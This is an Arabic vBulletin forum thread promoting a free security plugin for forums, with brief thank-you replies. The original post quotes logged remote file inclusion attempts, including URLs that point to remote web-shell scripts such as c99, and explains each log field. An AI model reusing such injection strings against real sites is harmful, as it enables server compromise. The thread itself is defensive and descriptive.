Untitled 1
 
m1 m
شبكة نساء الجنة الإسلامية
عدد الضغطات : 1,993
عدد الضغطات : 2,303


awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
العودة   |: معهد أول ستايل :| > قسم تطوير المنتديات > قسم تطوير منتديـــــvb3.6.0ــات
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

قسم تطوير منتديـــــvb3.6.0ــات قسم خاص للنسخة الجديدة


إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 26-05-2008, 01:06 AM   #1 (permalink)
:: مطرود من قبل الإدارة ::
Icon15f الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

بسم الله الرحمن الرحيم

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



عمل الهاك : حماية المنتدى بشكل كامل بعون الله

********************************
الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل


كود PHP:

2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081
//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

كود PHP:
2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 
2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 


الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة


كود PHP:

كود PHP:



التاريخ والوقت

كود PHP:

كود PHP:
 2007-12-1105:50:44
عدد المحاولات

كود PHP:

كود PHP:
 1197370244 


ايبي الموقع المصااب

كود PHP

كود PHP:
 209.67.223.188 


الاصابة طبعا تشفرت لاغراض امنيه

كود PHP:

كود PHP:
 p=11575//codebb/lang_select 


الاستغلال

كود PHP:

كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

كود PHP:

كود PHP:
 libwww-perl/5.808 
الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث


شرح حذف الهاك


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

*********************************


*---**-* التركيب *-**---*

لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت


تم تجربت المنتج على الاصدار

3.6.x

3.7.0


لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

يطرحه هنا في الموضوع لنصل لتطوير اكثر

وجل من لا يخطأ وانتظر استفساراتكم


((((وياريت مش يكون استفسار بل فكرة لتطوير او لتحديث لاى هاك لاى اسكربت
انحن شعب ياخذ ولا يفكر كى يعطى لقد خاب ظنى ولاكن هناك قلة من الاعضاء المميزين مثل ابو بسنت فهو يريد ان ياخذ ويعطى ما لدية واعرف ان هناك المزيد منك اى المتميزين ولاكن اين هم لماذا لا يظهرون اسالونى فلن ابخل عليكم بالعلم فقد تعهدت امام الله انا اعطى العلم لمن يريدة وارجو من الله ان تكونو من طالبى العلم لكى تتميزو )

لنرجع الى الهاك المميزززززززززززز جدا


لتتبع جديد الهاك على الرابط التالي

http://www.is-sw.net/index.php?issw=isswvb

الحمد لله على كل شيء

ولاكن الموقع الاساسى واقع حاليا

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم

المصدر
http://www.is-sw.net/vb/showthread.php?t=4329
ولاكن الموقع الاساسى واقع حاليا

ملحوظة ::
يوجد شبه في 20 %

بين الهاك التركي وبين هاك فريق i.s.s.w
لاكن الاساس للفكره هي مبرمج واحد وهو i.s.s.w
هاك الفريق الامني مطور كليا عن الهاك التركي

يتميز في عده ميزات
الاول الامان والدقه في البرمجة حيث يمتلك اربع صفات لاتوجد في غيره بسهوله
يتميز هاك الفريق الامني في حمايه ملف config من العرض في الشيل او عن طريق عرض السورس له

ونسبه نجاح التصدي 60% لاكن اذا تم عرض السورس لملف الكونفيق من موقع ما على السيرفر فهذي الحمايه تفقد ميزتها بعون الله سوف نجد لهذه الحركه الحل
*****************************************
ثانيا :تعرضت المنتديات العربيه في الفتره الاخيره لنوعين من الحقن في التمبلتات الحمد لله في هذا الاصدار تم غلقهم نهائي دون التعديل على القوالب
*****************************************
ثالثا :ميزه الاستعلام والحذف الجماعي او استغلال رقم العضويه دون الدخول للمنتدي في شكل كامل فهوا يحمي من استعلاماتها
*****************************************
رابعا : اكواد التحويل وسحب الكوكيز واستغلالت كثيره تخص xss تم تلافيها في هذا الاصدار من الحمايه القويه
*****************************************

وتوجد ميز اخرى ونقاط استطيع توضيحها بسهوله لاكن التجربه خير برهان على ما اقول

بالنسبه للهاك Product Rg Security

هو عباره عن مجمع لسرقه حقوق مبرمجين عرب واجانب ولا توجد اي اضافه حصريه فيه ويمكنك الاطلاع على سورس البرنامج ولايوجد فيه ترابط انما مضهري غير جوهري
تجد فيه عده برمجيات جمعت باضافه الابلينق وهذا له استغلالات كثيره وخطوره ويمكن اي مبرمج توضيح هذا

قد وضح هذا الامر اخونا بارك الله فية i.s.s.w


واكيد اخى العزيز ابو الليل يعرفة كما اعرفة انا شخصياً فهوة متميز

بارك الله فيكم

الهاك بالمرفقات

اخوكم
دكتور/ كمال محمد محمد
************************************************** **************************

 

الموضوع الأصلي : الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1     -||-     المصدر : |: معهد أول ستايل :|     -||-     الكاتب : op4host
الصور المرفقة

: del.jpg‏
: 4.7 كيلوبايت
: jpg
: 6
: اضغط هنا

الملفات المرفقة

: i[1].s.s.w v 4.1.zip‏
: 7.3 كيلوبايت
: zip
: 21
: اضغط هنا





   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 06-06-2008, 09:31 PM   #2 (permalink)
:: عضو جديد ::

 






 
تمتمات غير متواجد حالياً
 


افتراضي رد: الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

يعطيك العافية دكتور/ كمال محمد محمد


مشكور على الهاك




   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 08-06-2008, 01:26 AM   #4 (permalink)
افتراضي رد: الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

بارك الله فيك ورعاك اخوي كمال


اقتباس:
المشاركة الأصلية كتبت بواسطة MoGaa.NeT مشاهدة المشاركة
ولله احيانا احس ان الاختراق عن طريق هاكات الحمايه الي مثل هذاي
اقتباس:
المشاركة الأصلية كتبت بواسطة MoGaa.NeT مشاهدة المشاركة

يلا الله يعين


معك حق اخوي الغالي بو حبيبة
ولكن لا تنسي ان الهاك عرض بين اكبر المطورين
وحسب ما سمعت ايضاً ان الهاك اجنبي
ومعرب فقط




التوقيع

  1. التعلم ليس بالامر الصعب ولكن ركز وتلقي المعلومة جيداً
  2. المعهد ملك للجميع وليس لفرد واحد سلطة عليه
  3. الحب والاخلاص سبب نهوض الكثير فلنحب بعضنا ونخلص لبعضنا البعض


   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 08-06-2008, 01:33 AM   #5 (permalink)
:: مطرود من قبل الإدارة ::
افتراضي رد: الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

لاكن اخى الحبيب ابو الليل تعرف ان الفريق الامنى الذى برمج هذا الهاك الذى يوجد عندنا وعندى فى كل منتدياتى فهم فريق ممتاز بصراحة

فهاك من برمجيتهم مش اخاف منة كتير وى الباقى

بارك الله فيك اخى العزيز ورعاك المولى عز وجل




   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 08-06-2008, 03:24 AM   #6 (permalink)
-:: إدارة الإقسام ::-
 
الصورة الرمزية SeRvEr
افتراضي رد: الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

مشكور اخوي
وربي يوفق من قام بعمل هذا الهاك الرائع جداً




التوقيع

:: نقاط هامة يجب ان تعرفها ::
  1. ليس لشركة اول ستايل علاقة بالتعاملات التجارية بين اي شركة اخري غير أول ستايل
  2. تفحص العرض جيداً فقد يكون هناك سم مدسوس وسط السطور
  3. اسأل مليون مرة عن عملاء من ستتعامل معه قبل ان تصبح ضحية
  4. لا يمكن الحكم علي احد في مجال الانترنت إلا بواسطة العملاء
  5. كن دائماً صاحب حق لانك عميل.. والعميل علي حق.. ولكن في حدود المعقول
  6. يرجي ان تحتفظ ببيانات لوحة تحكم الدومين الخاص فيك بنفسك ويكون مسجل ببياناتك ومعك مفتاح التفويض
شبكة أول ستايل لخدمات الانترنت
   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

awlstyle-2 awlstyle-3 awlstyle-1
awlstyle-5
قديم 16-03-2009, 05:41 PM   #8 (permalink)
:: عضو جديد ::

 






 

Users Flag!
tun!siano غير متواجد حالياً
بيانات موقعي
اسم الموقع: منتديات تونيزيا ستار
إصدار المنتدى: VB 3.8.1
 


افتراضي رد: الان احمي منتداك من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

ssssssssssssssssssssssssssssssssssssssssssssssssss sssssssssss




التوقيع

شبكة أول ستايل لخدمات الويب المتكاملة
   
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
awlstyle-4
awlstyle-7 awlstyle-6
awlstyle-9 awlstyle-10 awlstyle-8

إضافة رد
Submit Thread >  Submit to AddThisTo Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Google Submit to Yahoo! This Submit to Technorati Submit to StumbleUpon Submit to Spurl Submit to Netscape  < Submit Thread


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:13 AM.

Powered by vBulletin® Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0 ,
Ads Management Version 3.0.0 by Saeed Al-Atwi

a.d - i.s.s.w


Alexa Group By SudanSon

ضع ايميلك ليصلك كل جديد في شبكتنا:

Delivered by FeedBurner

خريطة الموقع

معاً لعهد جديد بالداخلية ولنرجع مصرنا آمنة 

FOOTER-2
FOOTER-1

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59